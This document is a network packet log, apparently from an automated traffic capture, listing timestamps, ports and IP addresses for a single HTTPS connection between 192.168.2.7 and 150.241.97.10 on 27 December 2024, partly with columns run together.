                                                                      Dec 27, 2024 09:05:23.253015995 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.253047943 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.354114056 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.354211092 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.354227066 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447412014 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447426081 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447470903 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447555065 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.447599888 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447607040 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.480715036 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480730057 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480766058 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480797052 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.480808973 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480838060 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.502254963 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502265930 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502291918 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502319098 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.502331018 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502357960 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.551594973 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551609039 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551632881 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551695108 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.551708937 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551743031 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.635335922 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635349035 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635380983 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635426044 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.635468006 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635484934 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.648288965 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648298979 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648328066 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648365021 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.648395061 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648410082 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.664298058 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664310932 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664349079 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664375067 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.664387941 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664417982 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.676376104 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676384926 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676404953 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676441908 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.676476002 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676487923 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.686470985 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.686481953 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.686501980 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.686526060 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.686557055 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.686570883 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.695056915 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.695069075 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.695089102 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.695121050 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.695153952 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.695174932 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.754812956 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.754832029 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.754903078 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.754931927 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.765624046 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.765640020 CET44349719150.241.97.10192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 27, 2024 09:05:23.765666008 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.765680075 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.765713930 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.765738010 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.835155010 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.835171938 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.835200071 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.835252047 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.835282087 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.835299969 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.843563080 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.843576908 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.843597889 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.843622923 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.843650103 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.843662977 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.851097107 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.851111889 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.851133108 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.851155996 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.851182938 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.851197958 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.861150980 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.861165047 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.861185074 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.861207962 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.861239910 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.861254930 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.868732929 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.868743896 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.868786097 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.868813992 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.868828058 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.876259089 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.876271963 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.876323938 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.876353979 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.876372099 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.882906914 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.882947922 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.882972956 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.883002996 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.883018017 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.890440941 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.890475035 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.890502930 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.890532017 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.890554905 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.896025896 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.896099091 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.896126032 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.901721954 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.901782990 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.901799917 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.907325029 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.907393932 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.907419920 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.914752007 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.914805889 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.914830923 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.923893929 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.923949003 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.923974991 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.928878069 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.928895950 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.928940058 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:23.928961992 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:23.983860016 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.035939932 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.035958052 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.035986900 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.036022902 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.036050081 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.039956093 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.039968967 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.040016890 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.043864965 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.043883085 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.043920994 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.043955088 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.048855066 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.048870087 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.048964977 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.052624941 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.052634954 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.052685022 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.056474924 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.056549072 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.061191082 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.061249018 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.064888000 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.064955950 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.068706036 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.068780899 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.072325945 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.072391033 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.082072973 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.082145929 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.087028027 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.087101936 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.105169058 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.105243921 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.108935118 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.109000921 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.126674891 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.126816034 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.131479025 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.131819010 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.238554001 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.238642931 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.242275000 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.242779016 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.245861053 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.245923042 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.250746012 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.250816107 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.254580021 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.254646063 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.272959948 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.273030043 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.273680925 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.273745060 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.274599075 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.274657011 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.274688005 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.274750948 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.278207064 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.278270960 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.282597065 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.282660961 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.287421942 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.287486076 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.305366039 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.305440903 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.308954954 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.309014082 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.326915026 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.326986074 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.331506014 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.331577063 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.438424110 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.438509941 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.443200111 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.443269968 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.446896076 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.446959972 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.450577021 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.450638056 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.454205990 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.454262972 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.459089041 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.459146976 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.462809086 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.462874889 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.466439009 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.466494083 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.471287966 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.471352100 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.475043058 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.475105047 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.483364105 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.483433962 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.487521887 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.487581968 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.505393982 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.505460024 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.508398056 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.508455038 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.527987003 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.528047085 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.531893015 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.531955957 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.639839888 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.639914036 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.643058062 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.643125057 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.647417068 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.647486925 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.650966883 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.651036024 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.655615091 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.655776024 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.659523964 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.659617901 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.663325071 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.663408995 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.667943954 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.668020010 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.671803951 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.671902895 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.676358938 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.676424980 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.679152012 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.679228067 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.686418056 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.686491013 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.692075014 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.692171097 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.708401918 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.708472013 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.713176012 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.713243008 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.731185913 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.731262922 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.734961033 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.735033989 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.843077898 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.843167067 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.846863985 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.846927881 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.851619005 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.851684093 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.855443001 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.855510950 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.859046936 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.859112024 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.862734079 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.862792969 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.867664099 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.867738008 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.871153116 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.871211052 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.874928951 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.874984980 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.878627062 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.878735065 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.887100935 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.887170076 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.891865969 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.891932011 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.908535957 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.908612013 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.912173033 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.912236929 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.930871010 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.930947065 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:24.935686111 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:24.935750008 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.043224096 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.043307066 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.046977997 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.047043085 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.050631046 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.050698042 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.055429935 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.055490971 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.059113979 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.059195042 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.062812090 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.062875986 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.067652941 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.067725897 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.071325064 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.071419001 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.075124025 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.075186014 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.078737974 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.078820944 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.087476969 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.087551117 CET  49719        443        192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:25.090486050 CET  443          49719      150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:25.090558052 CET  49719        443        192.168.2.7    150.241.97.10
                                                                      Dec 27, 2024 09:05:25.109359980 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:25.109443903 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:25.112230062 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:25.112288952 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:25.137469053 CET44349719150.241.97.10192.168.2.7
